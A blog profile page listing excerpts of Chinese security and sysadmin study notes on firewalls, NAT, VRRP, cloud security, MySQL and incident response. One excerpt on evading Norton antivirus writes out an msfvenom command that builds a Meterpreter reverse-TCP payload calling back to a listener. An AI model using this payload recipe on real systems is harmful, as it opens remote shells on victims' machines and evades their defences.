- 博客(24)
- 资源 (77)
- 收藏
- 关注
原创 红帽7.0离线配置VNC
一、挂载本地库Mount /dev/cdrom /mntCd /etc/yum.repos.dVim local.repoYum clean all二、安装vncrpm -qa |grep vncgtk-vnc2-0.5.2-7.el7.x86_64gvnc-0.5.2-7.el7.x86_64tigervnc-server-minimal-1.2.80-0.30.20130314svn5065.el7.x86_64tigervnc-licens...
2021-03-31 11:24:10 453
原创 网络扫描与网络诱捕
信息收集 - 目标基本信息目标基本信息是指企业概况、企业理念、规模、产品、工商注册等信息。通过对目标基本信息的收集,攻击者可以对目标形成初步了解,定位其核心价值资产。信息收集 - 目标组织架构目标组织架构是进行企业流程运转、部门设置及职能规划等最基本的结构依据。在信息收集过程中出基本组织架构外还应对目标的分公司、子公司、母公司等进行详细的信息收集。通过组织架构信息情报的收集可以扩大攻击面、增加成功率。信息收集 - 目标其他公开信息目标其他公开信息包括目标新闻、论坛/会议发言、招投标...
2021-03-20 12:35:20 1600
原创 攻防概述
网络攻击链情报收集调查研究/探测/网络扫描/漏洞挖掘/社会工程学工具准备准备攻击工具,如木马/后门/蠕虫等病毒, 攻击负载等载荷投递直接渗透间接:钓鱼社工漏洞利用漏洞利用诱惑用户点击本地代码执行释放载荷创建局点内部扩散自动的重复上面几步建立通道控制服务器通信, 接收指令目标达成破坏数据窃取DDoS垃圾邮件挖矿内部扩散(自动)简化的网络攻击链目标侦察准确识别目标,收集目标详细信息,比如...
2021-03-19 13:38:27 1250
原创 安全防范趋势、信息安全管理、隐私保护
信息安全发展的三个阶段:通信保密,信息安全,信息保障Wind River的安全专家则针对IoT设备安全提出了如下建议:安全启动设备首次开机时,理应采用数字证书对运行的系统和软件作认证;访问控制采用不同的访问和资源控制方式,限制应用对设备的访问,即便产生攻击也能够让攻击影响最小化;设备认证在传输和接收数据前,IoT设备应该与连接网络进行认证;防火墙/IPS企业环境内的IoT设备需要DPI(深度包检查)或防火墙的防护,以便于流量控制;实时安全升级及时进行最新...
2021-03-18 14:58:04 6836
原创 云安全架构的设计
公有云安全概述云安全职责划分-共同担责软件即服务SAAS云服务厂家几乎负责所有的安全性,因为租户只能访问、管理和使用其提供的应用程序,但无法对应用程序做破坏性操作。例如:SAAS服务厂家提供安全、日志、运维、审计、应用安全性检测等,二租户只能给管理租户账户和权限。平台及服务PAAS云服务厂家负责平台的安全性,租户负责平台上部署的应用,包括所有的应用安全配置。两者职责几乎均分。例如RDS关系型数据库服务,云服务厂家提供RDS实例管理安全、RDS实例的修复和核心配置。租户对数据库账户、...
2021-03-17 14:28:11 11287
原创 选择题整理
1.信息安全事件频发的原因是存在漏洞病毒后门程序等安全攻击手段(错误 )1.国际知名的制定信息安全标准的组织有哪些?(AB )A.ISOB.IECC.ITUD.IETF信息安全管理体系遵循的是_PDCA(Plan, Do, Check, Action)_____流程。1.以下哪个不属于TCP/IP协议簇?( C)A.数据链路层B.传输层C.会话层D.应用层2.以下哪个报文是TCP三次握手的首包?(B )A.SYN+ACKB.SYNC.ACKD.FIN1.采用默认we
2021-03-14 14:49:53 9923
原创 云数据中心网络安全技术
云数据中心网络安全业务需求云数据中心安全现状云平台安全威胁逐年加剧。 云数据中心威胁主要来自于黑客攻击、恶意用户和用户误操作。 主要威胁有特权滥用、DDoS攻击、数据泄露和误操作等。云数据中心网络概述数据中心(Data Center):是一整套包括建筑在内复杂的设施。它不仅包括计算机系统和其它与之配套的设备(例如通信和存储系统),还包含冗余的数据通信连接、环境控制设备、监控设备以及各种安全装置。数据中心的使用分层架构。一般L1特指云数据中心基础设施,L2指云数据中心的ICT设备。...
2021-03-10 14:59:41 3205 2
原创 加密算法
对称加密算法 流加密 RC4 wifi常用分组加密 DES 56位密钥,加密64位数据3DES AES 密钥长度128,192,256IDEA RC2,RC5,RC6 SM1,SM4 国密算法非对称加密 DH 生成密钥算法RSA DSA 散列算法 MD5 MESSAGE DIGEST ALGORITHM 5SHA SECURE HASH ALGORITH SM3 SENIOR MIDDLE 3...
2021-03-05 16:19:17 128
原创 VRRP
防火墙双机热备在核心设备核心链路需要做冗余备份,可以避免单点故障热备:实时备份冷备:离线备份/手工备份vrrp:虚拟路由冗余协议(独立,发送和返回方向不一样)在一个广播域内,将多台路由器的接口加入到同一个逻辑的备份组,备份组有一个虚拟的IP地址,这个虚拟的IP地址作为主机的网关地址,虚拟IP弟子只有主设备会响应。广播域 相同网段就是一个广播域,VLAN也是广播域虚拟MAC 每一个VRRP备份组都会有自己的虚拟MACVRRP通告报文 组播报文:224.0.0.18,只有主设备会周期性(1s
2021-03-05 16:18:32 223
原创 NAT
NAT网络地址转换:缓解地址枯竭Ipv4 32位Ipv6 128位私网地址:A 10.0-10.255 10.0.0.0/8B 172.16-172.31.255 172.16.0.0/12C 192.168-192.168.255 192.168.0.0/16公网地址:其余都是公网地址私网地址不能再公网中路由,否则导致通信混乱URPF可以丢掉不存在路由NAT技术原理私网转换为公网 一对一 NO PAT多个私网转换为一个公网 多对一 NAPT/PAT端口号是65535,通过转换
2021-03-05 16:16:55 188
原创 ASPF
安全策略动态放行firewall detect ftp(启用动态放行功能,开启aspf功能)ASPF application specific packet filter功能1、识别应用层数据2、根据应用层数据,产生server-map表3、后续报文、匹配serve-map表,直接转发tips:server-map表的优先级比安全策略表优先级高Display firewall session tableDisplay firewall server-mapASPF对多通道协议的支持STU
2021-03-05 16:15:41 706
原创 信息安全防范与趋势&信息安全管理
信息安全的发展历程通信保密阶段信息安全阶段信息保障阶段安全防范发展与趋势安全架构的演变威胁防御的滞后性,应从以威胁为中心的防御,转向以业务为中心的安全治理:业务安全治理体系人工智能安全架构网络韧性网络在面对正常运行的各种故障和挑战时,提供并保持可接受的服务水平的能力。业务安全韧性在威胁条件下快速恢复核心业务水平的能力。NIST IPDRRNIST:IPDRR,以可信与韧性为目标的通用安全架构。识别,保护,检测,响应,恢复实现韧性的方法论主动安全业务安全规范
2021-03-05 14:12:21 366
原创 WEB常见漏洞
命令执行漏洞常见的分析方式下载源代码并部署测试环境结合手工和工具对程序进行代码审计攻击利用定义通过浏览器或者辅助程序提交执行命令,因为未对执行参数过滤,导致没有绝对命令的 情况下执行命令。常见利用函数system(),eval(),exec()分类代码层商业应用需要执行的命令系统层bash破壳漏洞,控制bash的环境变量第三方组件wordpress中magemagick的 图片处理,java中的struts2/elasticsearch暴力破解.
2021-03-05 13:37:32 212 1
原创 实战免杀诺顿shellcode载入内存免杀
生成shellcodemsfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.241.132 lport=8080 -e-p:指定payload;-e:指定编码方式;-i:编译次数;-b:去除指定代码,一般都是空代码或者错误代码;lhost:指定本机监听端口;-f:指定生成格式;-o:指定生成输出位置;shellcode执行盒执行https://github.com/clinicallyinane/shell
2021-03-04 13:08:57 1058 1
原创 http状态基础知识
HTTP1.0 HTTP1.1 GET HEAD POST GET POST HEAD和前两者差别不大 OPTIONS PUT DELETE TRACE CONNECT http常见的状态码 100-101 信息提示 2...
2021-03-04 08:54:23 86 3
原创 数据库备份连接
数据库备份工具mysqldump备份工具mysqladmin管理工具程序连接yum install -y php-mysqlpip install pymysql初始化配置源码安装,编译过程中设置初始化参数配置文件,数据库启动之前,设定配置文件参数。启动脚本执行,mysql_safe --skip-grant-tables --skip-networking配置文件读取顺序mysqld --help --verbose | grep my.cnf启..
2021-03-04 08:52:12 162 2
原创 centos8安装mysql及基本配置
解压安装案例1.环境准备(1)准备虚拟机和linux镜像vm15procentos8xshellxftpmysql因为是准备,所以先查看一下主机名和ip。将其修改成我们想要的。hostname mysqlhostname因为新系统网卡一般不是自动开,所以需要设置自启。nm-connection-editor#图形界面搞上或vim /etc/sysconfig/network-scripts/ifcfg-ens33#可能名称不一样,记得用tab.
2021-03-04 08:51:00 389 1
原创 应急响应笔记
应急响应windows入侵排查常见的应急响应事件分类:web入侵:网页挂马,主页篡改,webshell 系统入侵:病毒木马,勒索软件,远控后门 网络攻击:ddos攻击,dns劫持,arp欺骗入侵排查思路一、检查系统账号安全检查服务器是否有弱口令,远程管理端口是否对公网开放。(询问相关服务器管理员)检查服务器是否有可以账号,新增账号。(cmd窗口输入lusrmgr.msc,查看是否有新增或可疑账号,如果管理员组administrator有新增账号请立刻删除或禁用)查看服务
2021-03-04 08:49:44 568 1
原创 mysql基础管理
mysql用户 linux用户 作用 登录mysql数据库; 管理mysql对象 登录linux系统; 管理linux对象 特点 用户名@'白名单'(白名单指的是地址列表,允许白名单的ip登录mysql,管理mysql) 用户名 guest@'localhost' guest通过本地登录(sock...
2021-03-04 08:46:47 87 1
原创 mysql体系结构
mysql的程序结构和ssh十分相似。mysql客户端/服务器结构(c/s)(1)本地socket连接方式socket=/tmp/mysql.sockmysql -S /tmp/mysql.sock说明:只能本地使用,不依赖于ip和端口(2)远程tcpip链接方式mysql -uroot -p123 -h 10.0.0.51 -P 3306#u user#p password#h host#P port服务端实例实例:mysqld+工作线程+预分配的内存结构
2021-03-04 08:45:31 61 1
原创 mysql权限管理
权限作用用户对于数据库对象,有哪些 管理能力。权限的表现方式具体的命令。mysql> show privileges;+----------------------------+---------------------------------------+-------------------------------------------------------+| Privilege | Context .
2021-03-04 08:44:40 94 1
原创 HCIE笔试知识点
执行命令deception detect-network id id-number ip-address mask [ vpn-instance vpn-instance-name ],配置诱捕的检测网段。缺省情况下,交换机上未配置诱捕的检测网段。b.执行命令deception decoy-network id id-number destination ip-address [ mask ] [ destination-port port &<1-20> ] [ vpn-.
2021-03-04 08:39:08 2073 1
原创 主机安全与加固&数据安全
主机安全简介主机安全:保证主机在数据存储和处理的保密性,完成性,可用性。包括软件,硬件,系统软件的自身安全。CVSS-漏洞评估系统common vulnerability scoring system,用来设计描述漏洞的严重程度,确定需要应急的紧急度和重要度。针对主机的渗透测试种类黑盒测试白盒测试渗透测试流程确定目标,信息收集,漏洞探测,漏洞利用,内网转发,内网渗透,痕迹清除,撰写报告信息收集操作系统类型:windows、linux应用服务类型:APP,WEB编写语言:jav
2021-03-03 16:34:31 882 1
原创 windows批量ping测试脚本
场景描述批量创建网卡后,很多虚拟网卡无法使用,需要ping网关激活,由于虚拟网卡较多,所以使用脚本较好。脚本@echo offfor /l %%i in (100,1,190) do ping 192.168.1.254 -S 192.168.1.%%i pause
2021-03-03 14:15:48 2454
Study Tips for Improving Long-Term Retention and Recall.pdf
2021-08-06
Effective learning- Twenty rules of formulating k.pdf
2021-08-06
Dr Krashen的二语习得理论 Principles_and_Practice.pdf
2021-08-06
【博客】同样用anki,但很多细节可能导致使用效果相差巨大-LearnHacks博客.pdf
2021-08-06
【博客】MarginNote作为anki的上游,anki作为核心,写作作为下游,自此读书的闭环已经建.pdf
2021-08-06
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人